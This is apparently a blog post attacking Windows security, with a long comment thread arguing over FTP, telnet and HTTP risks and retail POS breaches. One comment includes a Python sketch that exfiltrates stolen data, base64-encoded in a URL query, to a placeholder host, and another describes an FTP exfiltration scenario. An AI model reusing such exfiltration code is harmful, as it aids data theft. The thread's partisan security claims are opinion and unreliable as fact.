More Failures Of The Wintel Monopoly

A zero-day exploit of M$’s OLE, one of its tools of lock-in, is now being used to attack Swiss banking customers who have not patched: “The Sandworm vulnerability is being actively abused to attack Swiss banking customers, Danish security consultancy CSIS has warned.”

See The ULTIMATE CRUELTY: Sandworm uses PowerPoint against Swiss bank customers.

“Secunia estimates 12.6 per cent of UK users are running unpatched operating systems, up from 9.7 per cent the previous quarter. In addition, one in 10 third-party programs on the average PC are exposed due to failures in installing the latest security updates.”

See UK consumers particularly prone to piss-poor patching.

Of course, this damage could have been mitigated by promptly patching when M$ releases their “Patch Tuesday” updates or sooner in an emergency. That’s the point. Consumers are not IT-people. They don’t know about this stuff. They just know about the speed and convenience of PCs on the web. That other OS is supposed to be “easy to use” but that’s just PR in the ads. It’s also easy to lose all security, have the system slow to a halt or crash. Sometimes, M$ gets it wrong and the patches don’t work. Consumers eventually buy another machine or take the box in for repairs to get it working again.

Even proper IT-people have problems with M$’s zero-day vulnerabilities. Sometimes the malware-writers take the clues and have exploits released in hours so the patching has to happen at an inconvenient hour. I remember working over my lunch hour to patch >100 systems. We used WSUS and automatic updates on the clients but always a few would need to be reminded and then there were the servers… I hated Patch Tuesdays because a convenient time for release in Redmond, WA was the middle of my work-day where I lived. Basically, unless the world has IT-people working 24×7 the world is vulnerable for several billion PC-hours every month even if they patch religiously.

Then there’s GNU/Linux, which is relatively free from malware, about 1K times freer, and keeps getting better with each release.

Of course, one should patch GNU/Linux systems too, but they do very well unpatched. The great beauty of GNU/Linux for consumers is that there are hundreds of distros and the typical malware-artist can’t hack them all simultaneously, whereas “the monopoly” is a single big fat target. So better code, less malware and diversity all work together to protect consumers, whereas the salesmen running M$ seek to make life “easy” for both consumers and malware-writers. I choose freedom. I use Debian GNU/Linux.

About Robert Pogson

I am a retired teacher in Canada. I taught in the subject areas where I have worked for almost forty years: maths, physics, chemistry and computers. I love hunting, fishing, picking berries and mushrooms, too.

169 Responses to More Failures Of The Wintel Monopoly

  1. dougman says:

    M$ not so sure with Azure and its assuring cloud.

    http://arstechnica.com/information-technology/2014/11/azure-went-down-and-people-actually-noticed/

    “An update was made to Azure Storage that caused the storage front-end servers to get stuck in an infinite loop, leaving them unable to service any requests.”

    Sounds familiar: M$ pushes an update, actually a bad patch, and this causes an infinite reboot loop.

  2. dougman says:

    Weeeeeee….the patching just never ends.

    Microsoft just released the November rollup of product fixes to address issues that go back to April 2014…. April!!…. The new “dump” includes patches galore for Windows RT 8.1, Windows 8.1, and Windows Server 2012.

    http://support.microsoft.com/kb/3000850/

    Honestly, I think the entire “Start Me Up” advertisement should have been renamed “Patch Me Up”. Let’s reminisce with some more appropriate lyrics.

    If you patch me up
    If you patch me up I’ll never stop
    If you patch me up
    If you patch me up I’ll never stop
    I’ve been running hot
    You got me ticking gonna blow my top
    If you patch me up
    If you patch me up I’ll never stop..

    Now here is the funny part: in the advertisement M$ never included the following stanza, “You make a grown man cry”. Gee, I wonder why? Perhaps it’s too true…. LOLz.

  3. TEG wrote, “I don’t see any practical reason for, say, a so-called “big box retail” like Home Depot to run any sort of public-facing FTP service.”

    FTP servers are nearly perfect for distributing manuals, spec-sheets, brochures, etc. HomeDepot uses an FTP service for suppliers to upload video demonstrations of products.

    Lots of businesses use FTP for such data. e.g. Electrolux

    FTP may be the most efficient way to shift large files. Businesses appreciate efficiency because it increases their bottom line.

  4. oiaohm says:

    That Exploit Guy, NT 3.5 shipped with telnet installed by default. It was the last OS to do this. Nothing released in the 1990s other than NT came with a telnet server installed by default. It’s one of the historic oddities. But the issue is that Microsoft’s telnet server is just as insecure now as it was in the NT 3.5 time-frame.

    http://technet.microsoft.com/en-us/library/cc772455%28v=ws.10%29.aspx
    Question: how do you enable SSL on the Microsoft-provided telnet server to protect user-names, passwords and other transferred data? The answer is you don’t. Telnetd on Linux has an SSL mode. Again, telnetd on Linux has a chroot around its user access. At most, with Microsoft telnet, you can protect the login data by using NTLM authentication, but this does not encrypt the stream as required to prevent packet injection.

    The problem here, That Exploit Guy, is that the Microsoft telnet server is at the same security level as the Windows NT 3.5 telnet server was. No update for SSL security.

    This is the problem: once you start lifting up the Windows hood there are a lot of problems under it.

    I simply don’t see why anyone wants such a thing in 2014.
    That Exploit Guy, the simple reality is that people are idiots and install random things. If it should not be used, it should not be included as an option to choose from “Programs and Features”, or at least there should be a very big warning not to; Windows does neither. It’s 2014: there should be no telnet server in existence, other than ones just for games, that does not support SSL.

    That Exploit Guy, a few retailers here in Australia have an ftp server for MSDS (Material Safety Data Sheets).
    Seriously, unless you can download a hammer through the Internet, what is the point of having an FTP service?
    This just reminded me of something super stupid. A hammer has a Material Safety Data Sheet just in case you are dumb enough to eat it. Yes, it had instructions in case of ingestion, because that is a mandatory part of an MSDS. You’re in the USA; you might not have these completely wacky MSDS items. The hammer head contained enough toxic materials that it had to be listed.

  5. That Exploit Guy says:

    Of course, I am forgetting Windows users. Telnet to an NT server allowed you to browse everywhere and start whatever command you liked. On the scale of bad, it surpassed FTP.

    There is no Telnet server on Windows unless you deliberately install one through Programs and Features, and I simply don’t see why anyone wants such a thing in 2014.
    Similarly, in a non-sarcastic way, I don’t see any practical reason for, say, a so-called “big box retail” like Home Depot to run any sort of public-facing FTP service. Forget about security. Forget about everything else. It’s just putting the cart before the horse. Who cares? The one and only important issue here with FTP is that there is no justification whatsoever for its use in the given scenario. Seriously, unless you can download a hammer through the Internet, what is the point of having an FTP service?

  6. oiaohm says:

    DrLoser, by the way, Apache httpd and IIS virtual directories are just as big a risk for allowing an internal breach as an ftp server.

    Please note the ftpd home directory does not have to match the user’s login home directory. This is why it has its own ~/ftp/etc/passwd.

    So there is no reason why the login home cannot be /home/salcl1 while /home/salcl1/ftp is what the ftp server exposes. Due to the chroot of ftpd, accessing /home/salcl1 is out.
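
    Roughly, the layout looks like this (a sketch; the user name is just the example from this thread):

        /home/salcl1/                 <- real login home, never visible to ftp clients
        /home/salcl1/ftp/             <- chroot root; the ftp session sees this as /
        /home/salcl1/ftp/etc/passwd   <- ftpd’s own minimal passwd file inside the jail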

    If you are suffering from security risks with an ftp server on Linux, you have employed admins who don’t know how to configure the ftp server they are using.

    Of course, other servers make it easier to set such an offset. http://www.proftpd.org, for example, has a DefaultRoot option that is just ~; of course it is sane to change that to something like ~/ftp or ~/scanner. Yes, you can do the same using ftpd or pure-ftpd and every other Linux ftp server, just with different configuration files to change. All of them include chroot limitations and the means to alter where that is. Better-quality servers include items like bandwidth limits and IP access-range limits.
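
    As a minimal sketch, a ProFTPD configuration fragment along those lines might look like this (DefaultRoot, TransferRate and <Limit LOGIN> are real ProFTPD directives; the paths, rate and address range are made-up examples):

        # /etc/proftpd/proftpd.conf (fragment) -- hypothetical example
        # Chroot every user into the ftp/ subdirectory of their home so the
        # real login home stays out of reach of the ftp session.
        DefaultRoot ~/ftp

        # Cap download bandwidth per transfer, in KB/s.
        TransferRate RETR 256

        # Only accept logins from the local LAN (example range).
        <Limit LOGIN>
          Order allow,deny
          Allow from 192.168.1.0/24
          Deny from all
        </Limit>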

    This is the problem: the complete security issue you talked about is 90 percent administrator error, i.e. turning on an FTP server and not configuring it.

    Using a company ftp server set up correctly is a lot more secure than using items like Dropbox. Yes, a user’s ftp home directory can have absolutely nothing in common with their system login directory, and that is normally what you call correctly configured ftp.

    Basically, if by this logic you cannot have ftp, you cannot have remote http or much of anything else. The idea that ftp servers on Linux are not sandboxed is completely wrong. I sometimes hear this from people who have never set any Linux ftp server up correctly. Just like http-class servers, you need to allow only skilled staff to do this.

    There is really no security difference between a properly configured ftp server and a properly configured http server. It is the exact same set of issues.

    Out of the 12 ftp servers for Windows, only one includes any form of isolation, and that is the Microsoft one, for Windows Server only. This is just an extremely sad state of affairs. The LogicalDOC and CrushFTP servers, for example, support chroot on Linux, BSD…; under Windows they do nothing to protect the provided ftp.

    If you want to talk about who has an ftp problem, it’s not Linux as such. Linux can have misconfigured ftp servers. Misconfigured http servers can happen as well; this comes down to the quality of your administration staff.

    Most of the Windows ftp servers are downright poor quality, and it really will not matter how much the administrators do to attempt to fix them.

    Note: Linux has 7 ftp servers, Windows 12. Yes, Windows has more choice of ftp servers, but every choice is crap except for one, and that one means buying a Microsoft server product. On Linux, every ftp server is good on security; it just needs to be configured correctly and not built on defective libraries.

    DrLoser, you have really just presumed that the issue with FTP is a major Linux thing. It’s not. DrLoser, please obey the rule in future: before throwing stones, make sure you are not the one standing in the glass house. Attacking Linux people over FTP while being a Windows person, you should expect major rocks thrown back.

  7. dougman says:

    Check out the pricing on these Surface things: https://www.google.com/search?q=surface+pro&oq=surface+pro&aqs=chrome..69i57l2j69i60j69i65l3.1630j0j4&sourceid=chrome&es_sm=122&ie=UTF-8#q=surface+pro&tbm=shop

    Honestly, Chromebooks are a better deal. Surface devices are full of problems, like overheating, and M$ keeps pushing out patches and firmware updates to fix them all.

    http://www.infoworld.com/article/2608605/tablets/surface-pro-3-problems-linger-despite-three-firmware-patches-in-a-month.html

    http://www.infoworld.com/article/2608879/microsoft-windows/fifth-surface-pro-3-patch-in-two-months-still-doesn-t-address-the-big-problems.html

    http://www.infoworld.com/article/2608942/microsoft-windows/microsoft-tries-yet-again-to-fix-surface-pro-3-wi-fi-problems.html

    Seriously, don’t expect M$ to rush to resolve the majority of these problems soon; all they seem to care about is continual patching and reaching for your wallet.

    All the units currently in stock, sitting on shelves, suffer from these problems, waiting for a consumer to bear the brunt of the M$ headache.

  8. DrLoser wrote, “have you come up with a credible scenario whereby it’s just as easy to exfiltrate stashed data via HTTP as it is via FTP?”

    Sure, the malware browses to FaceBook and fills out text-fields or uploads a file to whatsit.ru or …

    If uploads are banned somehow, malware can just browse the nodes of a botnet with encrypted data mixed into the URI, like http://someserver.somewhere/index.php?q=iklorgjkjhjkwgefkhzdsfkjbjdgjfdjhrg, and that server replies with some random sentence.
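
    Something like this little Python sketch is all the malware would need (the host name is the made-up one above; urlsafe base64 just keeps arbitrary bytes legal inside a query string):

        # Hypothetical sketch: smuggling data out in an ordinary-looking HTTP GET.
        import base64
        import urllib.request

        def exfiltrate(data: bytes) -> None:
            # URL-safe base64 makes arbitrary bytes legal in a query string.
            token = base64.urlsafe_b64encode(data).decode("ascii")
            # To a firewall this looks like a routine web request.
            urllib.request.urlopen(
                "http://someserver.somewhere/index.php?q=" + token, timeout=10)

        exfiltrate(b"stolen data goes here")

    To the network, it is just one more GET among gazillions.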

  9. oiaohm says:

    http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html

    DrLoser, really, the link from your link is a far better read. This is the process of dealing with flaws: 1) work out how it got in; 2) work out when it was first detected; 3) design a mitigation plan. Notice that the code at Microsoft was not scanned.

    Yes, it is 2014 and Microsoft is not using Coverity to look for defects.

    http://www.coverity.com/press-releases/coverity-releases-platform-update-for-openssl-heartbleed-defect/
    Yep, Coverity has been updated to detect Heartbleed-like bugs. OK, Valgrind was able to detect these bugs before, by brute force.

    http://www.sciencedaily.com/releases/2014/11/141113140011.htm
    Since SELinux and other Linux LSMs could not detect Shellshock or the recent OpenSSL issues: hello, evolution.

    Then you have the Core Infrastructure Initiative by the Linux foundation.

    Give it a few years. This is what happens with the Linux stack: weaknesses turn up, and the system develops a new level of hardening to prevent them.

  10. oiaohm says:

    Unconstrained ftp servers have not existed on Linux and BSD for over 20 years.

    A lot of the third-party FTP servers for Windows that users install so that multi-function printers/copiers work are truly unconstrained FTP servers.

    This is one of the big problems: Linux being administered by Windows-trained admins sees them over-reacting to stuff. FTP is not that harmful in the Linux world due to the better quality of the ftp servers.

  11. oiaohm says:

    DrLoser
    The wonderful thing about unconstrained FTP is that it allows me to browse all over the place.
    Of course, I am forgetting Windows users. Telnet to an NT server allowed you to browse everywhere and start whatever command you liked. On the scale of bad, it surpassed FTP.

    ftpd is not an unconstrained ftp server: http://linux.die.net/man/8/ftpd . Unconstrained FTP servers have not existed on Linux for years; these days they only exist on Windows. ftpd implements a chroot around the accessing process. This is standard minimum practice for every ftp server on Linux, BSD and OS X. On Windows you don’t have chroot.

    Security holes are required to break out of ftp on Linux.

    As soon as someone uses “unconstrained” and “ftp” together when talking about Linux, you know they don’t have a single clue. You need a privilege escalation or a chroot-breach exploit, as well as an ftp server flaw, to get very far on Linux with even the most basic Linux FTP server. ftpd is the most basic ftp server Linux has. Yes, it’s not recommended, because it lacks some limiting options.

  12. DrLoser says:

    Just to be scrupulously fair about all this, here’s a link via Eric Lippert to CVE-2014-6332, which (what with being present from Win95 onwards) seems to be a huge beef around here.

    Let’s see what you all make of it.

  13. DrLoser says:

    Here’s a serious question, oiaohm.

    Do you have any IT security credentials at all? I mean, any?

    Certificates? Courses taken at the University of New England? A favourite book?

    Anything?

  14. DrLoser says:

    Yes, ftpd also supports disabling anonymous logins.

    How long did it take you to google that, oiaohm?

    I could have saved you the time. I knew that back in 1991.

    Now, here’s the thing. I have this FTP login ID, y’see, let’s call it for no very good reason salcl1. And I have the password to the account, y’see, which again for no very good reason we will assume is some sort of medium-strength thing like 4l4sk4!.

    The wonderful thing about unconstrained FTP is that it allows me to browse all over the place. What with various security holes I could even outreach myself, but in this case I’m just going to limit myself to things that Mr Dozy is apparently allowed to access. Mr Dozy being the idiot with said credentials.

    Now, Mr Dozy is allowed, for no good reason at all (I have pointed this out) to exfiltrate RAM-scraped data from a POS to what I presume is his desktop on a local network. That, in itself, should give you pause.

    Mr Dozy is now allowed to use the wonders of NFS (and to be absolutely scrupulously fair, it could be any other corporate file-sharing protocol) to exfiltrate said data to a server that has an outward facing FTP daemon.

    This is going to be tricky for you to figure out on your own, oiaohm, but …

    Guess what happens next?

    No animals were harmed in the course of this post. No M$ software was imputed. No criticism of any form of *nix was at any time implied.

    Sticking an outward facing FTP server in front of a corporate network is fscking INSANE!

  15. oiaohm says:

    Yes, ftpd also supports disabling anonymous logins.

  16. oiaohm says:

    DrLoser, the old FTP protocol as implemented by ftpd and configured with the -E switch is harmless when anonymous data provision/receipt is configured correctly. The old FTP standard never said that you have to allow every user on a system to use it.

    The telnet server on NT took you to a cmd environment where you could do everything you liked as long as you had the user name and password.

    I am not cavalier. The reality is that you raised ftpd, DrLoser. That program is one of the few items that can in fact implement the old ftp protocol securely by modern-day standards. Port 21 ftp can and does accept TLS ftp, or FTPS, a secure, up-to-date version of ftp.

    http://www.ipv4security.com/packet_flow/ftp_over_ssl.html
    You are the cavalier one, DrLoser, killing off all ftp. Not all ftp is exploitable.

    http://en.wikipedia.org/wiki/FTPS

    It is 2014. FTPS, a sub-form of ftp, was formalized in 2005 yet had been around since 1996. What is cavalier is that the Windows command-line ftp client does not support it; Linux, OS X and BSD do. Windows is the most common cause of FTP server security on Linux and BSD being downgraded.

    Basically, FTP being a security issue should have died out by now.

    You have two choices with an old protocol: limit it or don’t use it. An advantage of using the old ftp protocol is the fact that it’s not encrypted; since it’s not encrypted, proxy servers can cache it.

    DrLoser, it’s like http vs https: http is older and insecure, but used correctly it is absolutely zero security risk. ftp and ftps are the same, except for one key difference: ftp and ftps can be sitting on exactly the same port. Yes, some ftp/ftps servers have a honeypot mode where, if you attempt to log in unencrypted, you are blacklisted.
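
    From the client side, a minimal sketch of that same-port arrangement using Python’s standard ftplib (the host is made up; the credentials are DrLoser’s examples from this thread):

        # Explicit FTPS: a plain port-21 connection upgraded with AUTH TLS.
        from ftplib import FTP_TLS

        ftps = FTP_TLS("ftp.example.com")  # ordinary port-21 connection
        ftps.login("salcl1", "4l4sk4!")    # ftplib sends AUTH TLS before login, so
                                           # the password never crosses in clear text
        ftps.prot_p()                      # encrypt the data channel too
        print(ftps.nlst())                 # list files over the protected channel
        ftps.quit()

    A server that refuses plain-text logins, as described above, would simply drop any client that skipped the AUTH TLS step.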

    DrLoser, when did you do your security audit? I guess prior to 2005 and the newer ftp protocols. Before sftp, closing ftp on devices could bring a nasty problem, like not being able to update firmware on some devices.

    http://en.wikipedia.org/wiki/SSH_File_Transfer_Protocol Yes, sftp and ftps are two different protocols.

    FTPS is not firewall-transparent due to its multi-port usage. A properly configured ftp server using modern-day standards is by nature limited to the local LAN unless the administrator messes with the firewall rules.

    Please note ftpd does not implement sftp; it only implements ftps. So -E, without messing with anything else, basically equals accepting logins only from the local LAN unless they are anonymous.

  17. DrLoser says:

    Quite honestly, oiaohm, given your cavalier attitude towards FTP, I wouldn’t recommend that anybody entrust you with the security demands of an electric fence.

    Which, given that little oopsie with a $1 million prize bull, perhaps nobody does any longer …

  18. DrLoser says:

    I would actually make the claim (though I admit this would be hard to sustain, and I’d have to put considerable effort in) that a vanilla Telnet port is less of a security risk than the equivalent FTP port.

    And, believe me, that’s saying something.

    Now, Robert, have you come up with a credible scenario whereby it’s just as easy to exfiltrate stashed data via HTTP as it is via FTP?

    No? Colour me unsurprised.

  19. DrLoser says:

    Security demands a process of deprecation and limitation.

    Nope. Security “demands” (even this is questionable and domain-dependent) proper architecture and proper auditing. Deprecation and limitation are completely irrelevant.

    The old FTP protocol, limited, is harmless.

    This is a circular argument. You are basically saying that the “old FTP protocol” is harmless, except when it isn’t.

    When outward facing, FTP is almost certainly the worst possible protocol you can choose from the point of view of security.

    Nothing else in your mountain of text can excuse that fact.

  20. DrLoser says:

    There are many SSL libraries that emulate OpenSSL…

    OK, stop that nonsense right there.

    Whether or not a library emulates any other library that reliably implements a protocol is of no interest to anybody at all.

    Does it reliably implement the underlying protocols?

    That’s all we need to know.

  21. oiaohm says:

    There are many SSL libraries that emulate OpenSSL. In an embedded device you may have an SSL library called WolfSSL: 20 times smaller than OpenSSL, it supports all the OpenSSL interfaces, has full formal documentation and, better yet, zero CVE issues ever.

    DrLoser, the problem is that WolfSSL is pure GPLv2 and a lot of people don’t like the license.

    Big question: how come WolfSSL is 20 times smaller than OpenSSL? Yep, OpenSSL contains a lot of garbage code that does not relate to making a sane implementation.

    FOSS has provided good, solid SSL implementations. Yes, the insecure, messy option has been chosen due to its less restrictive license. So an ftpd using WolfSSL does not contain any of the OpenSSL issues.

    DrLoser, if FOSS were always crap you would not have functionally secure implementations of stuff in FOSS. The problem is making bazaar users/buyers avoid the crap projects so that the crap projects have to lift their game.

  22. oiaohm says:

    DrLoser
    As regards “under-documented,” I do so believe, oiaohm. Because the lack of documentation per se does not indicate vulnerability to any attack whatsoever. Now, you could propose the theory that, with full & open documentation, the attack vectors would be mitigated or (in Bizarro World) completely eliminated by third party testers, coders and so on … not that helped OpenSSL much … but that would be a completely different thing.
    OpenSSL is under-documented. Where is the formal document on how its random generator works, showing that it is mathematically sound? GnuTLS and most other commercial implementations of SSL have a formal document describing the random number generator. OpenSSL is the odd one out here.

    The issue here is that third-party testers did in fact detect the OpenSSL issues and Bash Shellshock, and this is documented in the OpenSSL and Bash bug lists. It turns out there is a difference between many eyes finding the bugs and those bugs being fixed. FOSS has operated as a police-less bazaar, with some coding equal to criminal behavior. The Linux Foundation has now provided a police force. So, like it or not, DrLoser, things have changed.

    DrLoser, lack of documentation may not indicate a security flaw, but it does mean a proper test suite cannot exist either. The OOXML, RTF and OLE MS Office formats are all under-documented and heavily lacking in test suites; the result is ongoing failures around those formats. The ODF CVE count vs the OOXML CVE count is hugely different: you can count ODF CVE issues on one hand, while OOXML, a younger format, is already in the hundreds of CVE issues. Why is OOXML so bad? Large sections of it are “do as MS Office does”; let’s not bother auditing whether that functionality is sane.

    DrLoser, how do you perform a full formal audit on something without producing the documentation? The answer is you cannot. The lack of documentation in FOSS projects is something to worry about; it is a sign of the lack of an audit team. But you also have to remember that closed-source companies like Microsoft and others are also guilty of lacking documentation. Lack of documentation is a symptom of a major issue.

    In fact, I can give you an example: Alfresco CMS. Everything its program does is documented. The result is a 0 CVE count. Alfresco was coded and audited.

    There are also examples in the FOSS world that are bad: the Apache httpd server is under-documented, and it has had a running list of flaws.

    This is one of the highly interesting things: quality of documentation directly links to CVE count. It’s the only provable correlation ever found that you can inspect, without having access to the source code, to work out CVE risk.

    DrLoser, FTP is correctly listed as insecure; this is also formally documented. You do have to remember that FTPS and SFTP both no longer send the password in plain text; both are newer versions of FTP. Yet if the data is public, there is no particular reason, other than FTP’s requirement of an IP address, not to have an FTP server open to the public.

    http://linux.die.net/man/8/ftpd Please do read the DARPA-standard FTP server documentation and note option -E. That is right: the item does not accept FTP sending passwords in plaintext. If you type any user other than anonymous on an unencrypted connection with ftpd, the connection is terminated straight away with this option on. It does not even validate whether the username is correct.

    DrLoser, yes, something might have an ftp server on it and it might be fully secure: anonymous access unencrypted, but anything else encrypted. Yes, the server called ftpd was designed by the BSD world and is fully secure if set up correctly. As well, its functionality is fully documented. So just because you detect an ftp server running does not mean there is a security issue.

    Current-day FTP server implementations should not accept passwords in plain text. Only out-of-date or poorly configured FTP servers will accept passwords in plain text. Yes, the current forms of the FTP protocol include encryption options.

    DrLoser, this is like SSL 2.0 all over again: protocols that should not be in use, or should be limited in use, are not limited by some implementers. Yes, disabling the old FTP way of accepting passwords and forcing clients to use the newer FTP protocols solves the security issue. Remember, old Windows networking also sent passwords in plain text.

    Security demands a process of deprecation and limitation. The old FTP protocol, limited, is harmless.

  23. DrLoser says:

    (Actually, to be precise, the same effect could be achieved on a Linux embedded machine by leaving an FTPd port open on 10.44.2.153 … but either way, not good. Not good at all.)

  24. DrLoser says:

    Incidentally, any lunatic who sets up their POS machines with any sort of “net use” capability whatsoever is being grossly negligent and deserves immediate dismissal, with prejudice.

    Once again, this is nothing to do with the specific OS. Imagine, for example, leaving an FTP server port open on a Linux embedded POS. The effect would be precisely the same.

    Security is security, no matter what OS you choose.

  25. DrLoser says:

    In other news, FTP may have been used to send out the data, but the servers were severely compromised so any networking protocol could have been used, even HTTP. See New BlackPOS Malware Emerges in the Wild, Targets Retail Accounts.

    The only thing new about that cite, Robert, is that it suggests that the actual RAM scraper has moved from some component of XPe itself to an Anti-Virus. Big deal. However:

    In one the biggest data breach we’ve seen in 2013, the cybercriminals behind it, offloaded the gathered data to a compromised server first while a different malware running on the compromised server uploaded it to the FTP. We surmise that this new BlackPOS malware uses the same exfiltration tactic.

    Not “some variant of the same exfiltration tactic,” Robert. The same tactic.

    Meaning, exfiltration via FTP.

    Note the preceding bit about net use t: and so on. What’s slightly alarming is that salcl1, whoever that might be, has presumably been phished for their password on a local subnet (I think we can agree that 10.44.2.153 is deep down on a subnet somewhere). This is actually worse than the server (be it Windows, Linux, Solaris, whatever) being compromised, in a sense, because you no longer need to exfiltrate the data from the POS terminal to the corp net via a borked service of some kind.

    So, that’s one more layer of security the Black Hats don’t need to compromise.

    Lucky them! After that, all they have to do is to use FTP (presumably via the same hapless salcl1) to exfiltrate the stash from the corp net to the outside world! Isn’t FTP wonderful?

    As for “any other protocol,” Robert … One of your better recent jokes, that.

    Try doing anything like this via simple HTTP, and you’re SOOL.

  26. DrLoser says:

    Yet for some reason you think that an under-documented document format does not create server attacks???

    As regards “under-documented,” I do so believe, oiaohm. Because the lack of documentation per se does not indicate vulnerability to any attack whatsoever. Now, you could propose the theory that, with full & open documentation, the attack vectors would be mitigated or (in Bizarro World) completely eliminated by third party testers, coders and so on … not that helped OpenSSL much … but that would be a completely different thing.

    That said, no, I am not claiming that it’s impossible, or even unlikely, that a server attack can be crafted via a document of some sort. And indeed I made no such claim.

    I am claiming that the two security domains are completely different. I am claiming that you can’t just shrug off an idiocy like exposing FTP ports to the outside world by saying “but, but, look at M$ Office!”

    I am claiming that negligence over FTP, or the moral equivalent thereof, is almost certainly the route used by the Target and Home Depot attackers to retrieve their stashes of credit card information.

    Why do I claim this? Occam’s razor. It’s incredibly hard to envisage a way for them to do this via the Awesome Borked Powers of Microsoft Word.

    With FTP facing outward from the corporate network, however … it’s a breeze.

  27. DrLoser says:

    M$ apologists aside, Windows was called out as “the exact reason” for the theft to occur.

    Those three words in quotation marks … I don’t suppose you could extend yourself (as you so often do) to provide an actual citation?

    Probably not. Because it would come from the executives whose inability a) to update their POS systems when past their shelf life and b) to secure their server systems from outsiders wanting to retrieve stashes of confidential information …

    … caused the problem in the first place.

    There’s a long and dishonourable history of corporate executives blaming others for their own failings, Dougie. Don’t be one to join their ranks.

  28. dougman says:

    M$ apologists aside, Windows was called out as “the exact reason” for the theft to occur.

    Walgreens is probably next, as they still run Windows Server 2003, Windows XP and XP Embedded.

  29. oiaohm says:

    http://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-11116/Microsoft-Sharepoint-Server.html Yes, Microsoft document formats are one of the ways to hack your privileges on a SharePoint server. Yet for some reason you think that an under-documented document format does not create server attacks???

    Really, DrLoser, Microsoft is in a real glass house. Interestingly enough, the open-source Alfresco, which implements the SharePoint protocol and is used by a huge number of companies, has zero CVE reports.

    http://www.linuxfoundation.org/programs/core-infrastructure-initiative

    This project, DrLoser, started after the last issue. Sorry to say, it is just like the change when the EU forced Microsoft to document things.

    The Linux Foundation is taking the OpenSSL and Bash examples as reason to act. In fact, they are smart enough to know that there might be another OpenSSL- or Bash-like land mine out there. This is why the project is called the Core Infrastructure Initiative. Its goals are to find the mismanaged projects and get them up to speed and, if that is not possible, to advertise the fact that they are insecure so as to prevent usage of those projects.

    DrLoser
    What a shame that Valgrind let you down. If only it were compulsory, except not.
    That is the thing. This is part of the Core Infrastructure Initiative changes: usage of tools like Valgrind by core projects will become compulsory. The correction to your line is that it should read:
    What a shame that Valgrind let you down. If only it were compulsory, except was not.
    As usage of Valgrind and other tools like it is basically compulsory from now on, projects will get black marks against them for not using such tools.

    Give it a few years and you are not going to have as many issues to complain about, DrLoser. At long last a group has taken formal responsibility to perform independent audits, with all the force required.

    Yes, keep on making a lot of noise, DrLoser. Then remember that all those bugs you are referring to are patched in up-to-date Linux distributions and OS X. Where will you find systems with those flaws? None other than MS Windows. Yes, programs do use ported Bash and ported OpenSSL on Windows. It is the Windows users who have the big, important mess to clean up. The Linux world will clean up the past mess of bugs and force, from now on, alterations in procedures to reduce how often it happens in the future.

    One or two rogue projects cause a lot of trouble. Please note the Shellshock issue was caused by the Bash developers adding a feature without doing a security audit on that feature. Interestingly enough, more and more distributions had been reducing usage of Bash before the Shellshock mess as well. Yes, Bash security was being questioned by distribution maintainers before Shellshock.

    Would you say that the OpenSSL issues or the Bash Shellshock issues came completely out of the blue? No, because all the evidence shows there were people not fully trusting either. The Bash Shellshock design issue was in fact first questioned in 2004.

    This is the reality: a lot of the recent issues with OpenSSL and Bash are over 10 years old, measured from the first question raised about the issue.

    DrLoser, being a TMR guy, you never bother following the history back. The Linux Foundation in fact did a video covering the bugs you have been talking about: where they came from, how they happened, and what was required to prevent them from happening again. This is why the Core Infrastructure Initiative is funded.

    DrLoser, before you keep on talking about Unix stupidity, please remember that Microsoft Windows Server was the last server OS to stop shipping with telnet enabled by default. Telnet is kinda worse than FTP. FTP was designed before the Internet existed: FTP is from 1971, while the Internet came into existence in the mid-1980s. sftp was designed in the time-frame of the Internet. By the way, FTP was not designed for Unix but instead for an OS called Multics. Telnet also comes from Multics.

    Unix is kinda a clone of Multics. MS trolls always blame things on Unix that have very little to do with Unix. Most of the insecurely designed Unix/Linux network protocols were created at MIT and Microsoft. It is quite a small list of groups responsible for poor protocols.

    DrLoser, I guess you like to forget the NetBIOS/NetBEUI mess, which was designed in the time of the Internet and also lacked functional security. Yes, that combination also sent passwords as plain text over the network.

  30. DrLoser wrote, ““Using the server” is precisely my point about FTP, in re Target and Home Depot and others.”

    So you’re the hacker! Watch out for extradition.

    In other news, FTP may have been used to send out the data, but the servers were severely compromised so any networking protocol could have been used, even HTTP. See New BlackPOS Malware Emerges in the Wild, Targets Retail Accounts. This wasn’t just about FTP by any means. There were multiple malwares working on multiple servers, collecting data and shipping it out. They certainly weren’t intercepting FTP. They were generating their own traffic consisting of stolen data.

  31. DrLoser says:

    So, since servers cost money, you can get more throughput for the money with FTP.

    For once, Robert, I didn’t even bother to verify your cites. (Which is fair enough. Apparently you routinely fail to do the same.)

    Show me a server that works 24 hours a day at maximum capacity (or even 50% capacity), and then we’ll talk.

    Otherwise this is either complete nonsense, or it’s a valuable consultancy opportunity for you, Robert.

    Somehow, I favour the former. But give it a go, anyhow.

  32. DrLoser says:

    Yes, it’s HTTP, not FTP. There’s little commonality between them.

    Really? I’m prepared to be amazed by your perspicacity on this subject, Robert.

    But, let’s first examine your Wikipedia cite, which sadly lacks peer-reviewed Pogsoniana:

    HTTP essentially fixes the bugs in FTP that made it inconvenient to use for many small ephemeral transfers as are typical in web pages.

    FTP has a stateful control connection which maintains a current working directory and other flags, and each transfer requires a secondary connection through which the data is transferred. In “passive” mode this secondary connection is from client to server, whereas in the default “active” mode this connection is from server to client.

    I am too poor an IT guy to have a fscking clue what that couple of paragraphs is on about. Do feel free to expand on whatever it was, Robert.

    Here’s the simplest way I can describe FTP: it’s a File Transfer Protocol, defined by RFC 959.

    In passing, isn’t it interesting that us “trolls” have spent the last twenty years of our lives dealing with RFCs and such, whereas all you, Robert, have managed to do is to drop a laptop onto an Arctic runway?

    Well, maybe not.

    Anyhow, let’s proceed from RFC959. It’s regrettably vague, but apparently it thinks that FTP is a protocol that exists above the transport (TCP/IP) level.

    I say “vague.” I mean, “Completely incorrect.”

    FTP is clearly at the ISO/OSI “Presentation level.” It’s a poster-child for the *nix stupidity of stipulating that everything to do with a protocol should be “in plain text.”

    As such, it’s not much use on its own. But, with a huge amount of effort, it can be incorporated into, say, HTTPS.

    And precisely how would that “incorporation” happen, Robert?

    Why, what a surprise! It’d be exactly the same exchange of bits and bytes over the “lower level protocol.”

    Eg, to take your example, HTTP.

  33. DrLoser wrote, “You do know the default protocol for downloading a file through HTTP, don’t you, Robert?”

    Yes, it’s HTTP, not FTP. There’s little commonality between them. See Wikipedia, FTP – Differences from HTTP. Basically, HTTP is better at what it does, transferring gazillions of smallish files, and FTP is better at what it does, transferring many larger files.

